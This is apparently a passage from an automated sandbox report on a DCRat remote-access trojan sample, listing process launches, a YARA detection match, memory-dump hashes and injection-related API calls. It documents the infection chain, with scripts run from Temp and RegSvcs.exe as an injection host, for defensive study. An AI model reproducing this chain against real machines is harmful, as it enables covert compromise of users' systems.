                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:37
                                    Start time:04:58:02
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:38
                                    Start time:04:58:03
                                    Start date:26/09/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    Imagebase:0x120000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:39
                                    Start time:04:58:03
                                    Start date:26/09/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                    Imagebase:0x980000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000027.00000002.2729558667.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000027.00000002.2794514159.0000000002C6A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000027.00000002.2794514159.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Has exited:true

                                    Target ID:40
                                    Start time:04:58:04
                                    Start date:26/09/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                                    Imagebase:0x7ff7be880000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Reset < >
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3256408286.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ff848d40000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                      • Instruction ID: ec5e2456d8ecbb338278cf80fb209fb499586c4e400f91c85df3ecb725cbd086
                                      • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                      • Instruction Fuzzy Hash: D201847010CB084FD748EF0CE051AB6B7E0FB85364F10056DE58AC3651D726E882CB45

                                      Execution Graph

                                      Execution Coverage:13.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:12
                                      Total number of Limit Nodes:0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 60 7ff848e5078d-7ff848e507c8 62 7ff848e507ca-7ff848e507cc 60->62 63 7ff848e507d1-7ff848e507d3 60->63 64 7ff848e507ce-7ff848e507d0 62->64 65 7ff848e507d5-7ff848e50814 62->65 63->65 64->63 68 7ff848e509c9-7ff848e50a79 65->68 69 7ff848e5081a-7ff848e50824 65->69 106 7ff848e50a7c-7ff848e50a8d 68->106 107 7ff848e50a7b 68->107 70 7ff848e5083d-7ff848e50842 69->70 71 7ff848e50826-7ff848e50833 69->71 74 7ff848e50848-7ff848e5084b 70->74 75 7ff848e5096a-7ff848e50974 70->75 71->70 79 7ff848e50835-7ff848e5083b 71->79 80 7ff848e5084d-7ff848e50856 74->80 81 7ff848e50862-7ff848e50866 74->81 77 7ff848e50976-7ff848e50982 75->77 78 7ff848e50983-7ff848e509c6 75->78 78->68 79->70 80->81 81->75 87 7ff848e5086c-7ff848e508a3 81->87 99 7ff848e508a5-7ff848e508c5 87->99 100 7ff848e508c7 87->100 101 7ff848e508c9-7ff848e508cb 99->101 100->101 101->75 102 7ff848e508d1-7ff848e508d4 101->102 102->75 105 7ff848e508da-7ff848e50914 102->105 123 7ff848e50916-7ff848e5092e 105->123 124 7ff848e50930-7ff848e50933 105->124 110 7ff848e50a8f 106->110 111 7ff848e50a90-7ff848e50b27 106->111 107->106 110->111 117 7ff848e50b2d-7ff848e50b37 111->117 118 7ff848e50c7f-7ff848e50caa 111->118 119 7ff848e50b39-7ff848e50b51 117->119 120 7ff848e50b53-7ff848e50b60 117->120 133 7ff848e50cac-7ff848e50cc1 118->133 134 7ff848e50cc3-7ff848e50d31 118->134 119->120 130 7ff848e50b66-7ff848e50b69 120->130 131 7ff848e50c20-7ff848e50c2a 120->131 123->124 132 7ff848e5093a-7ff848e50943 124->132 130->131 139 7ff848e50b6f-7ff848e50b77 130->139 136 7ff848e50c2c-7ff848e50c38 131->136 137 7ff848e50c39-7ff848e50c7c 131->137 140 7ff848e5095c-7ff848e50969 132->140 141 7ff848e50945-7ff848e50952 132->141 133->134 171 7ff848e50d34-7ff848e50d45 134->171 172 7ff848e50d33 134->172 137->118 139->118 146 7ff848e50b7d-7ff848e50b87 139->146 141->140 147 7ff848e50954-7ff848e5095a 141->147 148 7ff848e50b89-7ff848e50b9e 146->148 149 7ff848e50ba0-7ff848e50ba4 146->149 147->140 148->149 149->131 151 7ff848e50ba6-7ff848e50ba9 149->151 155 7ff848e50bab-7ff848e50bb4 151->155 156 7ff848e50bc0-7ff848e50bc4 151->156 155->156 156->131 161 7ff848e50bc6-7ff848e50bcc 156->161 162 7ff848e50bce-7ff848e50be9 161->162 163 7ff848e50beb-7ff848e50bf9 161->163 162->163 169 7ff848e50bfb-7ff848e50c08 163->169 170 7ff848e50c12-7ff848e50c1f 163->170 169->170 176 7ff848e50c0a-7ff848e50c10 169->176 174 7ff848e50d48-7ff848e50d6a 171->174 175 7ff848e50d47 171->175 172->171 177 7ff848e50d6c-7ff848e50d80 174->177 178 7ff848e50db4-7ff848e50dd4 174->178 175->174 176->170 182 7ff848e50d8e-7ff848e50d98 177->182 183 7ff848e50d82-7ff848e50d8c 177->183 180 7ff848e50ef9-7ff848e50fa9 178->180 181 7ff848e50dda-7ff848e50de4 178->181 223 7ff848e50fac-7ff848e50fbd 180->223 224 7ff848e50fab 180->224 184 7ff848e50dfd-7ff848e50e02 181->184 185 7ff848e50de6-7ff848e50df3 181->185 187 7ff848e50d9c-7ff848e50db3 182->187 188 7ff848e50d9a 182->188 183->182 190 7ff848e50e08-7ff848e50e0b 184->190 191 7ff848e50e9a-7ff848e50ea4 184->191 185->184 196 7ff848e50df5-7ff848e50dfb 185->196 187->178 188->187 190->191 197 7ff848e50e11-7ff848e50e14 190->197 193 7ff848e50ea6-7ff848e50eb2 191->193 194 7ff848e50eb3-7ff848e50ef6 191->194 194->180 196->184 199 7ff848e50e3b 197->199 200 7ff848e50e16-7ff848e50e39 197->200 204 7ff848e50e3d-7ff848e50e3f 199->204 200->204 204->191 208 7ff848e50e41-7ff848e50e4b 204->208 208->191 214 7ff848e50e4d-7ff848e50e57 208->214 216 7ff848e50e59-7ff848e50e63 214->216 218 7ff848e50e6a-7ff848e50e73 216->218 219 7ff848e50e8c-7ff848e50e99 218->219 220 7ff848e50e75-7ff848e50e82 218->220 220->219 225 7ff848e50e84-7ff848e50e8a 220->225 226 7ff848e50fbf 223->226 227 7ff848e50fc0-7ff848e50fcf 223->227 224->223 225->219 226->227
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2552716467.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 366d1b59deac34ecf2296c429ff1e30323eae9456bbfe8b82d6fafdf0cbad479
                                      • Instruction ID: 1963dbedc5f0c223927baf26d76f2e91988e8140471982055aa0ff5295413188
                                      • Opcode Fuzzy Hash: 366d1b59deac34ecf2296c429ff1e30323eae9456bbfe8b82d6fafdf0cbad479
                                      • Instruction Fuzzy Hash: 62523671E0EA8A5FE796BA6858256B5BBE0FF46350F0801FBE04DC7193DE289C05C355

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2542745168.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff848d80000_powershell.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 9d8d38c4a01121c9ba1a54dd126a8b1f4e5f2a86b7303a93f5d1a2a9bc31662c
                                      • Instruction ID: 1f6178c2547e453899002ea9a7756a740da3782b01995c09dd5df2de6ba7e00a
                                      • Opcode Fuzzy Hash: 9d8d38c4a01121c9ba1a54dd126a8b1f4e5f2a86b7303a93f5d1a2a9bc31662c
                                      • Instruction Fuzzy Hash: F1F17B7090DA998FDB99DF18C864BE9BBF0EF66310F0500EAC049E7292DB749985CB41

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2542745168.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff848d80000_powershell.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 62fa39539daf7071c61fe955c4d4e60b3ac78ddd583e5df9ed8cc3987a4e3f1a
                                      • Instruction ID: c935c45dbe65d0e69b45c8807522f58fa68b05a06c5340e79df1f6857c0dd09a
                                      • Opcode Fuzzy Hash: 62fa39539daf7071c61fe955c4d4e60b3ac78ddd583e5df9ed8cc3987a4e3f1a
                                      • Instruction Fuzzy Hash: 43612170908A5D8FDB98EF58C894BE9BBF1FB69310F1041AED04DE3291CB74A985CB44

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2542745168.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff848d80000_powershell.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 28ae28438f31c0a4ec0f70c04b585e2f244f23ef92ad9cee3f7e72e79a70cc0e
                                      • Instruction ID: cb4de86d5e3fb0c90d3c27159767b326cd5dba49f0da934deaf4eaa519476602
                                      • Opcode Fuzzy Hash: 28ae28438f31c0a4ec0f70c04b585e2f244f23ef92ad9cee3f7e72e79a70cc0e
                                      • Instruction Fuzzy Hash: E3518F70D0864D8FEB55DF99C884BE9BBF1FB66310F1482AAD048D7256C7749489CF50

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 52 7ff848d880c9-7ff848d880d5 53 7ff848d880d7-7ff848d880df 52->53 54 7ff848d880e0-7ff848d881aa ResumeThread 52->54 53->54 57 7ff848d881b2-7ff848d881f0 54->57 58 7ff848d881ac 54->58 58->57
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2542745168.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff848d80000_powershell.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 968e908417af06a7072defb85041755c7f7da5641e4e2dd08d20402fe614386b
                                      • Instruction ID: 06595908c3024675d713a856d7caa7e6274cd0cc659fcd4f102c7fb89440b186
                                      • Opcode Fuzzy Hash: 968e908417af06a7072defb85041755c7f7da5641e4e2dd08d20402fe614386b
                                      • Instruction Fuzzy Hash: 3941677090C74C8FDB59DFA8D885BA9BBB0FB5A310F1041AED049E7252DA70A889CB51

                                      Control-flow Graph

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2552716467.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b6a8c350bab4db817d4fb2bb0173a93d2109d2a518e8990f5506933d5deeeef9
                                      • Instruction ID: 3da8e119d05d3e533b92e9a77257d4e08c4b3be55aa8dee25ca9b26cd981a8a7
                                      • Opcode Fuzzy Hash: b6a8c350bab4db817d4fb2bb0173a93d2109d2a518e8990f5506933d5deeeef9
                                      • Instruction Fuzzy Hash: 2D919B71E0DB894FE79AAA6C5815575BBD1FF82268F0802FED44EC7083DF299C068385

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 326 7ff848e50d58-7ff848e50d6a 327 7ff848e50d6c-7ff848e50d80 326->327 328 7ff848e50db4-7ff848e50dd4 326->328 332 7ff848e50d8e-7ff848e50d98 327->332 333 7ff848e50d82-7ff848e50d8c 327->333 330 7ff848e50ef9-7ff848e50fa9 328->330 331 7ff848e50dda-7ff848e50de4 328->331 372 7ff848e50fac-7ff848e50fbd 330->372 373 7ff848e50fab 330->373 334 7ff848e50dfd-7ff848e50e02 331->334 335 7ff848e50de6-7ff848e50df3 331->335 336 7ff848e50d9c-7ff848e50db3 332->336 337 7ff848e50d9a 332->337 333->332 339 7ff848e50e08-7ff848e50e0b 334->339 340 7ff848e50e9a-7ff848e50ea4 334->340 335->334 345 7ff848e50df5-7ff848e50dfb 335->345 336->328 337->336 339->340 346 7ff848e50e11-7ff848e50e14 339->346 342 7ff848e50ea6-7ff848e50eb2 340->342 343 7ff848e50eb3-7ff848e50ef6 340->343 343->330 345->334 348 7ff848e50e3b 346->348 349 7ff848e50e16-7ff848e50e39 346->349 353 7ff848e50e3d-7ff848e50e3f 348->353 349->353 353->340 357 7ff848e50e41-7ff848e50e4b 353->357 357->340 363 7ff848e50e4d-7ff848e50e63 357->363 367 7ff848e50e6a-7ff848e50e73 363->367 368 7ff848e50e8c-7ff848e50e99 367->368 369 7ff848e50e75-7ff848e50e82 367->369 369->368 374 7ff848e50e84-7ff848e50e8a 369->374 375 7ff848e50fbf 372->375 376 7ff848e50fc0-7ff848e50fcf 372->376 373->372 374->368 375->376
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2552716467.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c1563312f4208292eaf3d9e0c9ef7ae2e25d2b5e6740160f6eb7d7f65a9cacc
                                      • Instruction ID: 6b70bed000cc84f3b60c0a95ec326d44dbd8e0abb6f157beecb0ae37c9d33635
                                      • Opcode Fuzzy Hash: 3c1563312f4208292eaf3d9e0c9ef7ae2e25d2b5e6740160f6eb7d7f65a9cacc
                                      • Instruction Fuzzy Hash: FA411762D1EB890FE7A6BAA818552B4BFE1FF52790F1800F7E04DC7193DE286C098355

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 397 7ff848e5085a-7ff848e50866 399 7ff848e5086c-7ff848e508a3 397->399 400 7ff848e5096a-7ff848e50974 397->400 410 7ff848e508a5-7ff848e508c5 399->410 411 7ff848e508c7 399->411 402 7ff848e50976-7ff848e50982 400->402 403 7ff848e50983-7ff848e50a79 400->403 440 7ff848e50a7c-7ff848e50a8d 403->440 441 7ff848e50a7b 403->441 413 7ff848e508c9-7ff848e508cb 410->413 411->413 413->400 414 7ff848e508d1-7ff848e508d4 413->414 414->400 417 7ff848e508da-7ff848e50914 414->417 428 7ff848e50916-7ff848e5092e 417->428 429 7ff848e50930-7ff848e50933 417->429 428->429 432 7ff848e5093a-7ff848e50943 429->432 435 7ff848e5095c-7ff848e50969 432->435 436 7ff848e50945-7ff848e50952 432->436 436->435 438 7ff848e50954-7ff848e5095a 436->438 438->435 443 7ff848e50a8f 440->443 444 7ff848e50a90-7ff848e50b27 440->444 441->440 443->444 448 7ff848e50b2d-7ff848e50b37 444->448 449 7ff848e50c7f-7ff848e50caa 444->449 450 7ff848e50b39-7ff848e50b51 448->450 451 7ff848e50b53-7ff848e50b60 448->451 459 7ff848e50cac-7ff848e50cc1 449->459 460 7ff848e50cc3-7ff848e50d31 449->460 450->451 457 7ff848e50b66-7ff848e50b69 451->457 458 7ff848e50c20-7ff848e50c2a 451->458 457->458 464 7ff848e50b6f-7ff848e50b77 457->464 462 7ff848e50c2c-7ff848e50c38 458->462 463 7ff848e50c39-7ff848e50c7c 458->463 459->460 491 7ff848e50d34-7ff848e50d45 460->491 492 7ff848e50d33 460->492 463->449 464->449 468 7ff848e50b7d-7ff848e50b87 464->468 469 7ff848e50b89-7ff848e50b9e 468->469 470 7ff848e50ba0-7ff848e50ba4 468->470 469->470 470->458 472 7ff848e50ba6-7ff848e50ba9 470->472 475 7ff848e50bab-7ff848e50bb4 472->475 476 7ff848e50bc0-7ff848e50bc4 472->476 475->476 476->458 481 7ff848e50bc6-7ff848e50bcc 476->481 482 7ff848e50bce-7ff848e50be9 481->482 483 7ff848e50beb-7ff848e50bf9 481->483 482->483 489 7ff848e50bfb-7ff848e50c08 483->489 490 7ff848e50c12-7ff848e50c1f 483->490 489->490 496 7ff848e50c0a-7ff848e50c10 489->496 494 7ff848e50d48-7ff848e50d6a 491->494 495 7ff848e50d47 491->495 492->491 497 7ff848e50d6c-7ff848e50d80 494->497 498 7ff848e50db4-7ff848e50dd4 494->498 495->494 496->490 502 7ff848e50d8e-7ff848e50d98 497->502 503 7ff848e50d82-7ff848e50d8c 497->503 500 7ff848e50ef9-7ff848e50fa9 498->500 501 7ff848e50dda-7ff848e50de4 498->501 543 7ff848e50fac-7ff848e50fbd 500->543 544 7ff848e50fab 500->544 504 7ff848e50dfd-7ff848e50e02 501->504 505 7ff848e50de6-7ff848e50df3 501->505 507 7ff848e50d9c-7ff848e50db3 502->507 508 7ff848e50d9a 502->508 503->502 510 7ff848e50e08-7ff848e50e0b 504->510 511 7ff848e50e9a-7ff848e50ea4 504->511 505->504 516 7ff848e50df5-7ff848e50dfb 505->516 507->498 508->507 510->511 517 7ff848e50e11-7ff848e50e14 510->517 513 7ff848e50ea6-7ff848e50eb2 511->513 514 7ff848e50eb3-7ff848e50ef6 511->514 514->500 516->504 519 7ff848e50e3b 517->519 520 7ff848e50e16-7ff848e50e39 517->520 524 7ff848e50e3d-7ff848e50e3f 519->524 520->524 524->511 528 7ff848e50e41-7ff848e50e4b 524->528 528->511 534 7ff848e50e4d-7ff848e50e63 528->534 538 7ff848e50e6a-7ff848e50e73 534->538 539 7ff848e50e8c-7ff848e50e99 538->539 540 7ff848e50e75-7ff848e50e82 538->540 540->539 545 7ff848e50e84-7ff848e50e8a 540->545 546 7ff848e50fbf 543->546 547 7ff848e50fc0-7ff848e50fcf 543->547 544->543 545->539 546->547
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.2552716467.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff848e50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 63cbfeb15510eea44ebc2ea0a6e3fc8cd6b979a38acc7c09d2894d9c865404d1
                                      • Instruction ID: 58409e25927db6d05e90d95c14a13f3cb6e0a8e152542bb3447bafc7b5c526a8
                                      • Opcode Fuzzy Hash: 63cbfeb15510eea44ebc2ea0a6e3fc8cd6b979a38acc7c09d2894d9c865404d1
                                      • Instruction Fuzzy Hash: 12310162E1FE864FF6A9BABC1425678A5D0FF812E0F5800BAE40DC71D7DE2C9C04035A
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2366827075.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ff848d60000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction ID: bc0501f1201566dc9ffe0d8f6b2584905b48253a8f3fa7cb9f6eb1e5913ed53d
                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction Fuzzy Hash: 2301843010CB0C4FD748EF0CE051AB5B3E0FB85360F10056DE58AC3651DB26E882CB45
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.3476536552.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_7ff848d50000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction ID: 7aee3915925e05f19ece98ec9f9312f33fb455ee61de874a9d5d5a517c5b5622
                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                      • Instruction Fuzzy Hash: AD01713010CB084FD748EF0CE051AA5B3E0EB85360F10056EE58AC3651D626E882CB45

                                      Execution Graph

                                      Execution Coverage:11.6%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:12
                                      Total number of Limit Nodes:0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 63 7ff848e2041d-7ff848e20472 65 7ff848e204bc-7ff848e204c3 63->65 66 7ff848e20474-7ff848e2047a 63->66 69 7ff848e204cd-7ff848e204d2 65->69 70 7ff848e204c4-7ff848e204cb 65->70 66->70 71 7ff848e2047c-7ff848e204a4 66->71 72 7ff848e204d8-7ff848e204db 69->72 73 7ff848e205fa-7ff848e20604 69->73 70->69 80 7ff848e20659-7ff848e20697 71->80 81 7ff848e204aa-7ff848e204b4 71->81 76 7ff848e204dd-7ff848e204e6 72->76 77 7ff848e204f2-7ff848e204f6 72->77 78 7ff848e20613-7ff848e20629 73->78 79 7ff848e20606-7ff848e20612 73->79 76->77 77->73 87 7ff848e204fc-7ff848e20533 77->87 90 7ff848e2062d-7ff848e20656 78->90 80->90 93 7ff848e20699-7ff848e20709 80->93 81->69 85 7ff848e204b6-7ff848e204b7 81->85 85->65 100 7ff848e20535-7ff848e20555 87->100 101 7ff848e20557 87->101 90->80 112 7ff848e2070b 93->112 113 7ff848e2070c-7ff848e2071d 93->113 102 7ff848e20559-7ff848e2055b 100->102 101->102 102->73 105 7ff848e20561-7ff848e20564 102->105 105->73 106 7ff848e2056a-7ff848e205a4 105->106 120 7ff848e205c0-7ff848e205c3 106->120 121 7ff848e205a6-7ff848e205be 106->121 112->113 115 7ff848e2071f 113->115 116 7ff848e20720-7ff848e20782 113->116 115->116 122 7ff848e207cc-7ff848e207e1 116->122 123 7ff848e20784-7ff848e207b7 116->123 127 7ff848e205ca-7ff848e205d3 120->127 121->120 136 7ff848e207e3-7ff848e207f0 122->136 132 7ff848e207bd-7ff848e207c7 123->132 133 7ff848e2090f-7ff848e209c1 123->133 130 7ff848e205ec-7ff848e205f9 127->130 131 7ff848e205d5-7ff848e205e2 127->131 131->130 137 7ff848e205e4-7ff848e205ea 131->137 132->136 138 7ff848e207c9-7ff848e207ca 132->138 172 7ff848e209c3 133->172 173 7ff848e209c4-7ff848e209d5 133->173 143 7ff848e208b0-7ff848e208ba 136->143 144 7ff848e207f6-7ff848e207f9 136->144 137->130 138->122 148 7ff848e208c9-7ff848e2090c 143->148 149 7ff848e208bc-7ff848e208c8 143->149 144->143 146 7ff848e207ff-7ff848e20807 144->146 146->133 150 7ff848e2080d-7ff848e20817 146->150 148->133 153 7ff848e20819-7ff848e2082e 150->153 154 7ff848e20830-7ff848e20834 150->154 153->154 154->143 156 7ff848e20836-7ff848e20839 154->156 159 7ff848e2083b-7ff848e20844 156->159 160 7ff848e20850-7ff848e20854 156->160 159->160 160->143 165 7ff848e20856-7ff848e2085c 160->165 166 7ff848e2087b-7ff848e20889 165->166 167 7ff848e2085e-7ff848e20879 165->167 174 7ff848e2088b-7ff848e20898 166->174 175 7ff848e208a2-7ff848e208af 166->175 167->166 172->173 177 7ff848e209d8-7ff848e20a32 173->177 178 7ff848e209d7 173->178 174->175 181 7ff848e2089a-7ff848e208a0 174->181 182 7ff848e20a7c-7ff848e20a83 177->182 183 7ff848e20a34-7ff848e20a3a 177->183 178->177 181->175 189 7ff848e20a8d-7ff848e20a92 182->189 190 7ff848e20a85-7ff848e20a8b 182->190 187 7ff848e20a3c-7ff848e20a64 183->187 188 7ff848e20a84-7ff848e20a8b 183->188 194 7ff848e20b89-7ff848e20c39 187->194 195 7ff848e20a6a-7ff848e20a74 187->195 188->189 192 7ff848e20a98-7ff848e20a9b 189->192 193 7ff848e20b2a-7ff848e20b34 189->193 190->189 192->193 199 7ff848e20aa1-7ff848e20aa4 192->199 196 7ff848e20b43-7ff848e20b86 193->196 197 7ff848e20b36-7ff848e20b42 193->197 231 7ff848e20c3b 194->231 232 7ff848e20c3c-7ff848e20c4d 194->232 195->189 201 7ff848e20a76-7ff848e20a77 195->201 196->194 203 7ff848e20acb-7ff848e20acc 199->203 204 7ff848e20aa6-7ff848e20ac9 199->204 201->182 206 7ff848e20acd-7ff848e20acf 203->206 204->206 206->193 209 7ff848e20ad1-7ff848e20adb 206->209 209->193 217 7ff848e20add-7ff848e20aeb 209->217 220 7ff848e20aca 217->220 221 7ff848e20aed-7ff848e20af3 217->221 220->203 223 7ff848e20afa-7ff848e20b03 221->223 224 7ff848e20b1c-7ff848e20b29 223->224 225 7ff848e20b05-7ff848e20b12 223->225 225->224 228 7ff848e20b14-7ff848e20b1a 225->228 228->224 231->232 233 7ff848e20c4f 232->233 234 7ff848e20c50-7ff848e20c88 232->234 233->234 236 7ff848e20c8a-7ff848e20c93 234->236 237 7ff848e20c95-7ff848e20ce9 234->237 236->237 240 7ff848e20e3b-7ff848e20eeb 237->240 241 7ff848e20cef-7ff848e20cf9 237->241 284 7ff848e20eed 240->284 285 7ff848e20ef2-7ff848e20f03 240->285 242 7ff848e20cfb-7ff848e20d10 241->242 243 7ff848e20d12-7ff848e20d17 241->243 242->243 246 7ff848e20dd8-7ff848e20de2 243->246 247 7ff848e20d1d-7ff848e20d20 243->247 249 7ff848e20df3-7ff848e20e38 246->249 250 7ff848e20de4-7ff848e20df2 246->250 251 7ff848e20d69 247->251 252 7ff848e20d22-7ff848e20d35 247->252 249->240 255 7ff848e20d6b-7ff848e20d6d 251->255 252->240 263 7ff848e20d3b-7ff848e20d45 252->263 255->246 258 7ff848e20d6f-7ff848e20d72 255->258 258->246 261 7ff848e20d74-7ff848e20d7a 258->261 264 7ff848e20d99-7ff848e20daf 261->264 265 7ff848e20d7c-7ff848e20d97 261->265 266 7ff848e20d5e-7ff848e20d67 263->266 267 7ff848e20d47-7ff848e20d54 263->267 276 7ff848e20dc8-7ff848e20dd7 264->276 277 7ff848e20db1-7ff848e20dbe 264->277 265->264 266->255 267->266 273 7ff848e20d56-7ff848e20d5c 267->273 273->266 277->276 281 7ff848e20dc0-7ff848e20dc6 277->281 281->276 284->285 288 7ff848e20eef 284->288 286 7ff848e20f0a-7ff848e20f44 285->286 287 7ff848e20f05 285->287 287->286 289 7ff848e20f07 287->289 288->285 289->286
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.3350608551.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_7ff848e20000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
